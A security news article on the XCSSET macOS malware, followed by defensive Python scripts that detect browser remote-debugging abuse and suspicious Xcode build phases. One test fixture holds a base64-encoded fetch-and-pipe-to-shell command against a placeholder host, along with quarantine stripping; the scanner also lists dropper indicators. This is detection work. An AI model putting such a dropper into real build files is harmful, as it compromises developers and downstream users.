A Mac malware campaign is targeting Xcode developers with a version of the XCSSET malware retooled to run natively on Apple's M1 chips. The malware was first spotted in August last year and has since gained features for stealing confidential information from cryptocurrency trading platforms.

What's new?

In March, Kaspersky researchers uncovered XCSSET samples compiled for Apple M1 chips, showing that the attackers had ported their executables to run natively on Apple Silicon.
  • Research by Trend Micro shows that XCSSET is still active and abuses a development build of the Safari browser to inject JavaScript backdoors into websites the victim visits, using Universal Cross-Site Scripting (UXSS).
  • The malware hosts Safari update packages on its C2 server and downloads and installs the package that matches the victim's macOS version. The packages have now been updated to support Safari 14.
  • It also abuses the remote debugging mode of other browsers, including Opera, Chrome, Brave, Qihoo 360 Browser, Microsoft Edge, Yandex Browser, and Firefox, to carry out the same UXSS attacks.
  • Furthermore, it tries to steal account information from various websites, including the cryptocurrency exchanges Binance and Huobi as well as Envato, NNCall[.]net, and 163[.]com, and it can swap the victim's cryptocurrency wallet addresses for attacker-controlled ones.
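
The remote-debugging abuse above leaves a visible trace: a browser process running with a debugging switch on its command line. The following hunting check is an added example, not code from Cyware, Trend Micro or the malware authors. It parses `ps -axo pid,ppid,command` output and flags the browsers named in the article when they carry a remote debugging switch. The switches are real Chromium (`--remote-debugging-port`, `--remote-debugging-pipe`, `--remote-debugging-address`) and Firefox (`-start-debugger-server`) options; the process listing is constructed, and the marker list and severity logic are assumptions of this example. Safari is not covered, since the article describes the malware bringing its own Safari package rather than passing a flag.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample of `ps -axo pid,ppid,command` output on a Mac. It is not a
# real capture; the paths are the usual app-bundle locations of these browsers.
SAMPLE_PS = """\
  PID  PPID COMMAND
  412     1 /Applications/Google Chrome.app/Contents/MacOS/Google Chrome
  987   412 /Applications/Google Chrome.app/Contents/MacOS/Google Chrome --type=renderer --lang=en-US
 1530   301 /Applications/Brave Browser.app/Contents/MacOS/Brave Browser --remote-debugging-port=9222 --headless
 1544   301 /Applications/Firefox.app/Contents/MacOS/firefox -start-debugger-server 6000
 1602   301 /Applications/Opera.app/Contents/MacOS/Opera --remote-debugging-pipe --user-data-dir=/tmp/op
 1711     1 /usr/libexec/syspolicyd
"""

# Executable-name fragments used to recognise the browsers named in the article
# (an assumption of this example; extend for other Chromium forks as needed).
BROWSER_MARKERS = (
    "Google Chrome", "Chromium", "Brave Browser", "Microsoft Edge", "Opera",
    "Yandex", "firefox", "360Chrome",
)

# Switches that turn on a remote debugging interface. The remote-debugging-*
# family belongs to Chromium (Chrome, Brave, Edge, Opera, Yandex, 360);
# start-debugger-server is Firefox's DevTools server switch, which Firefox
# accepts with one or two leading dashes.
REMOTE_DEBUG_FLAG = re.compile(
    r"(?<!\S)-{1,2}(?:remote-debugging-(?:port|pipe|address|socket-fd)"
    r"|start-debugger-server)\b"
)


@dataclass
class Finding:
    pid: int
    ppid: int
    browser: str
    flags: List[str]
    headless: bool  # remote debugging plus headless is the stronger signal


def browser_name(command: str) -> Optional[str]:
    """Return the browser marker found in a command line, or None."""
    lowered = command.lower()
    for marker in BROWSER_MARKERS:
        if marker.lower() in lowered:
            return marker
    return None


def scan_ps_output(ps_text: str) -> List[Finding]:
    """Return browser processes started with a remote debugging switch."""
    findings = []
    for line in ps_text.splitlines():
        parts = line.split(None, 2)
        if len(parts) < 3 or not parts[0].isdigit():
            continue  # header or malformed line
        pid, ppid, command = int(parts[0]), int(parts[1]), parts[2]
        browser = browser_name(command)
        if browser is None:
            continue
        flags = [m.group(0) for m in REMOTE_DEBUG_FLAG.finditer(command)]
        if not flags:
            continue
        headless = any(tok.startswith("--headless") for tok in command.split())
        findings.append(Finding(pid, ppid, browser, flags, headless))
    return findings


if __name__ == "__main__":
    for f in scan_ps_output(SAMPLE_PS):
        level = "HIGH" if f.headless else "MEDIUM"
        print(f"[{level}] pid={f.pid} ppid={f.ppid} {f.browser}: {' '.join(f.flags)}")
```

A developer who is genuinely driving a browser from Puppeteer or a web-driver will trigger this too, so treat a hit as a lead to pivot on (parent process, user, and whether a hidden or headless window is involved) rather than as a confirmed infection. On a real host, feed the function the output of `ps -axo pid,ppid,command` instead of the constructed sample.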

Recent attacks on M1 chips

Infected Xcode projects pose a major security risk because the payload lives inside the project itself and runs when the project is built, so targeted developers who share their work on GitHub can unknowingly pass the malware on to everyone who clones and builds it. The same mechanism turns these repositories into a supply-chain attack vector for anyone who pulls them in as dependencies of their own projects.
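
A practical counterpart to this warning is to inspect a cloned project's `project.pbxproj` for run-script build phases before building it, since a run-script phase is the generic place where a build-time payload executes. The check below is an added example, not code from Cyware or Trend Micro, and it does not reproduce XCSSET's specific injection technique, which Trend Micro documents separately. It extracts every `PBXShellScriptBuildPhase` object, decodes the pbxproj string escapes, scores the script against heuristic indicators (remote fetch, pipe to an interpreter, base64 decoding, AppleScript, `eval`, quarantine stripping), and re-scans any base64 blob that decodes to printable text. The pbxproj excerpt is constructed, and the indicator list is this example's assumption about what droppers tend to do, not a published signature.

```python
import base64
import re
from dataclasses import dataclass, field
from typing import List

# Constructed excerpt of an Xcode project.pbxproj (not taken from any real or
# infected project). The first run-script phase is a typical linter hook; the
# second is written to look like a build-time dropper.
SAMPLE_PBXPROJ = r'''// !$*UTF8*$!
{
    archiveVersion = 1;
    objectVersion = 52;
    objects = {
/* Begin PBXShellScriptBuildPhase section */
        A1B2C3D4E5F60718293A4B5C /* Run SwiftLint */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            files = (
            );
            runOnlyForDeploymentPostprocessing = 0;
            shellPath = /bin/sh;
            shellScript = "if which swiftlint >/dev/null; then swiftlint; fi\n";
        };
        0F1E2D3C4B5A69788796A5B4 /* ShellScript */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            files = (
            );
            runOnlyForDeploymentPostprocessing = 0;
            shellPath = /bin/sh;
            shellScript = "echo Y3VybCAtcyBodHRwOi8vZXhhbXBsZS5pbnZhbGlkL3AgfCBzaA== | base64 -D | sh\nxattr -d com.apple.quarantine \"$BUILT_PRODUCTS_DIR\"/*.app 2>/dev/null\n";
        };
/* End PBXShellScriptBuildPhase section */
    };
    rootObject = 00112233445566778899AABB /* Project object */;
}
'''

# One pbxproj object entry: 24-hex-digit id, comment, brace-delimited body.
# Run-script phases contain no nested braces, so a non-greedy match to the
# first "};" is enough for them; other object types would need a real
# OpenStep plist parser.
ENTRY_RE = re.compile(r"([0-9A-F]{24}) /\* (.*?) \*/ = \{(.*?)\};", re.S)
SCRIPT_RE = re.compile(r'shellScript = "((?:[^"\\]|\\.)*)";', re.S)
SHELL_PATH_RE = re.compile(r"shellPath = ([^;]+);")
BASE64_BLOB_RE = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")

# Heuristic indicators: assumptions about dropper behaviour, not XCSSET signatures.
INDICATORS = {
    "remote-fetch": re.compile(r"\b(?:curl|wget)\b"),
    "pipe-to-interpreter": re.compile(
        r"\|\s*(?:sudo\s+)?(?:(?:ba|z|da)?sh|python3?|perl|osascript)\b"),
    "base64-decode": re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b"),
    "applescript": re.compile(r"\bosascript\b"),
    "eval": re.compile(r"\beval\b"),
    "quarantine-strip": re.compile(r"\bxattr\b.*?com\.apple\.quarantine"),
}


@dataclass
class ScriptPhase:
    object_id: str
    name: str
    shell_path: str
    script: str
    indicators: List[str] = field(default_factory=list)


def unescape_pbx_string(value: str) -> str:
    """Undo the backslash escapes used inside quoted pbxproj strings."""
    return re.sub(r"\\(.)", lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)),
                  value, flags=re.S)


def parse_script_phases(pbxproj_text: str) -> List[ScriptPhase]:
    """Extract every PBXShellScriptBuildPhase object from a project.pbxproj."""
    phases = []
    for object_id, name, body in ENTRY_RE.findall(pbxproj_text):
        if "isa = PBXShellScriptBuildPhase;" not in body:
            continue
        script_match = SCRIPT_RE.search(body)
        script = unescape_pbx_string(script_match.group(1)) if script_match else ""
        path_match = SHELL_PATH_RE.search(body)
        shell_path = path_match.group(1).strip().strip('"') if path_match else ""
        phases.append(ScriptPhase(object_id, name, shell_path, script))
    return phases


def scan_script(script: str) -> List[str]:
    """Return sorted indicator names for a script; base64 blobs that decode to
    printable text are re-scanned and their hits prefixed with 'decoded:'."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(script)]
    for blob in BASE64_BLOB_RE.findall(script):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        if not all(ch.isprintable() or ch in "\n\t" for ch in decoded):
            continue
        hits.extend("decoded:" + name for name, rx in INDICATORS.items() if rx.search(decoded))
    return sorted(set(hits))


def audit_pbxproj(pbxproj_text: str) -> List[ScriptPhase]:
    """Parse and score all run-script phases of a project file."""
    phases = parse_script_phases(pbxproj_text)
    for phase in phases:
        phase.indicators = scan_script(phase.script)
    return phases


if __name__ == "__main__":
    for phase in audit_pbxproj(SAMPLE_PBXPROJ):
        status = "SUSPICIOUS" if phase.indicators else "ok"
        print(f"{phase.object_id} {phase.name!r} ({phase.shell_path}): {status} {phase.indicators}")
```

Run it over `*.xcodeproj/project.pbxproj` in any freshly cloned project before opening it in Xcode, since Xcode runs these phases on build. The base64 re-scan matters: in the constructed sample the plaintext script never mentions `curl`, and only decoding the blob reveals the fetch-and-pipe-to-shell pattern.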

Cyware Publisher